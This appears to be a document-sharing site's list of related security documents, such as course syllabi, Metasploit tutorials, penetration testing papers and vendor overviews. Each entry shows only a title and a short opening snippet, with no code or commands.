ITSY 2330 Intrusion Detection Course Syllabus ITSY 2330 Intrusion Detection Course Syllabus Instructor Course Reference Number (CRN) Course Description: Course Prerequisite(s) Course Semester Credit Hours (SCH) (Lecture, Lab) Name: Hung Le Tel: Office:

More information

Trustwave Managed Security Testing

Trustwave Managed Security Testing Trustwave Managed Security Testing SOLUTION OVERVIEW Trustwave Managed Security Testing (MST) gives you visibility and insight into vulnerabilities and security weaknesses that need to be addressed to

More information

Expert Webinar: Hacking Your Windows IT Environment

Expert Webinar: Hacking Your Windows IT Environment Expert Webinar: Hacking Your Windows IT Environment Presenters: Liam Cleary Microsoft MVP, Blogger helloitsliam@protonmail.com Jeff Melnick Pre-Sales Director, Netwrix Jeff.Melnick@netwrix.com www.helloitsliam.com

More information

Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013

Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013 Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013 Welcome Back! A Quick Recap of the Last Presentation: Overview of web technologies. What it is. How it works. Why it s attractive

More information

18-642: Security Mitigation & Validation

18-642: Security Mitigation & Validation 18-642: Security Mitigation & Validation 11/27/2017 Security Migitation & Validation Anti-Patterns for security mitigation & validation Poorly considered password policy Poorly considered privilege management

More information

Chapter 5: Vulnerability Analysis

Chapter 5: Vulnerability Analysis Chapter 5: Vulnerability Analysis Technology Brief Vulnerability analysis is a part of the scanning phase. In the Hacking cycle, vulnerability analysis is a major and important part. In this chapter, we

More information

ETHICAL HACKING LAB SERIES. Lab 3: Using the SYSTEM Account

ETHICAL HACKING LAB SERIES. Lab 3: Using the SYSTEM Account ETHICAL HACKING LAB SERIES Lab 3: Using the SYSTEM Account Certified Ethical Hacking Domain: System Hacking Document Version: 2015-08-14 otherwise noted, is licensed under the Creative Commons Attribution

More information

Security Testing. John Slankas

Security Testing. John Slankas Security Testing John Slankas jbslanka@ncsu.edu Course Slides adapted from OWASP Testing Guide v4 CSC 515 Software Security What is Security Testing? Validate security controls operate as expected What

More information

Pivoting ( Metasploit )

Pivoting ( Metasploit ) Pivoting ( Metasploit ) - Anurag Srivastava Email - Linkedin - theanuragsrivastava@gmail.com https://in.linkedin.com/in/hexachordanu Exploit-db Author page https://www.exploit-db.com/author/?a=9053 Greetz

More information

MQ Jumping... Or, move to the front of the queue, pass go and collect 200

MQ Jumping... Or, move to the front of the queue, pass go and collect 200 MQ Jumping.... Or, move to the front of the queue, pass go and collect 200 Martyn Ruks DEFCON 15 2007-08-03 One Year Ago Last year I talked about IBM Networking attacks and said I was going to continue

More information

Specialized Security Services, Inc. REDUCE RISK WITH CONFIDENCE. s3security.com

Specialized Security Services, Inc. REDUCE RISK WITH CONFIDENCE. s3security.com Specialized Security Services, Inc. REDUCE RISK WITH CONFIDENCE s3security.com Security Professional Services S3 offers security services through its Security Professional Services (SPS) group, the security-consulting

More information

ICS Penetration Testing

ICS Penetration Testing Connor Leach Jackson Evans-Davies 18 June, 2018 ICS Penetration Testing Understanding the Challenges and Techniques Introductions 1 Connor Leach, GPEN, OSCP - Senior Penetration Tester - Member of Canadian

More information

ANATOMY OF AN ATTACK!

ANATOMY OF AN ATTACK! ANATOMY OF AN ATTACK! Are Your Crown Jewels Safe? Dom Kapac, Security Evangelist WHAT DO WE MEAN BY CROWN JEWELS? Crown jewels for most organizations are critical infrastructure and data Data is a valuable

More information

The Six Most Dangerous New Attack Techniques And What s Coming Next? Ed Skoudis CounterHackChallenge

The Six Most Dangerous New Attack Techniques And What s Coming Next? Ed Skoudis CounterHackChallenge The Six Most Dangerous New Attack Techniques And What s Coming Next? MODERATOR: Alan Paller SANS Institute PANELISTS: Ed Skoudis CounterHackChallenge Johannes Ullrich SANS Internet Storm Center Session

More information

COPYRIGHTED MATERIAL. Contents. Part I: The Basics in Depth 1. Chapter 1: Windows Attacks 3. Chapter 2: Conventional and Unconventional Defenses 51

COPYRIGHTED MATERIAL. Contents. Part I: The Basics in Depth 1. Chapter 1: Windows Attacks 3. Chapter 2: Conventional and Unconventional Defenses 51 Acknowledgments Introduction Part I: The Basics in Depth 1 Chapter 1: Windows Attacks 3 Attack Classes 3 Automated versus Dedicated Attacker 4 Remote versus Local 7 Types of Attacks 8 Dedicated Manual

More information

Building Payloads Tutorial

Building Payloads Tutorial Building Payloads Tutorial Last updated 06/23/2014-4.9 With Metasploit Pro, you can build payloads with the Payload Generator. The Payload Generator provides a guided interface that you can use to quickly

More information

mhealth SECURITY: STATS AND SOLUTIONS

mhealth SECURITY: STATS AND SOLUTIONS mhealth SECURITY: STATS AND SOLUTIONS www.eset.com WHAT IS mhealth? mhealth (also written as m-health) is an abbreviation for mobile health, a term used for the practice of medicine and public health supported

More information

AURA ACADEMY Training With Expertised Faculty Call Us On For Free Demo

AURA ACADEMY Training With Expertised Faculty Call Us On For Free Demo ETHICAL HACKING (CEH) CURRICULUM Introduction to Ethical Hacking What is Hacking? Who is a Hacker? Skills of a Hacker? Types of Hackers? What are the Ethics and Legality?? Who are at the risk of Hacking

More information

A Model for Penetration Testing

A Model for Penetration Testing A Model for Penetration Testing Chuck Easttom Collin College Professional Development chuck@chuckeasttom.com Research Gate Publication Abstract Penetration testing is an increasingly integral part of cyber

More information

Cybersecurity Test and Evaluation Achievable and Defensible Architectures

Cybersecurity Test and Evaluation Achievable and Defensible Architectures Cybersecurity Test and Evaluation Achievable and Defensible Architectures October 2015, ITEA Francis Scott Key Chapter Mr. Robert L. Laughman for COL Scott D. Brooks, Director, Survivability Evaluation

More information

Evaluating Website Security with Penetration Testing Methodology

Evaluating Website Security with Penetration Testing Methodology Evaluating Website Security with Penetration Testing Methodology D. Menoski, P. Mitrevski and T. Dimovski St. Clement of Ohrid University in Bitola/Faculty of Technical Sciences, Bitola, Republic of Macedonia

More information

Define information security Define security as process, not point product.

Define information security Define security as process, not point product. CSA 223 Network and Web Security Chapter One What is information security. Look at: Define information security Define security as process, not point product. Define information security Information is

More information

Active Defence A chance to fight back. Dott. Agostino PANICO Rome, 09/06/2016

Active Defence A chance to fight back. Dott. Agostino PANICO Rome, 09/06/2016 Active Defence A chance to fight back Dott. Agostino PANICO Rome, 09/06/2016 $ cut -f5 -d: /etc/passwd grep -i panico PhD Student @ La Sapienza University of Rome Master Governance e Audit dei Sistemi

More information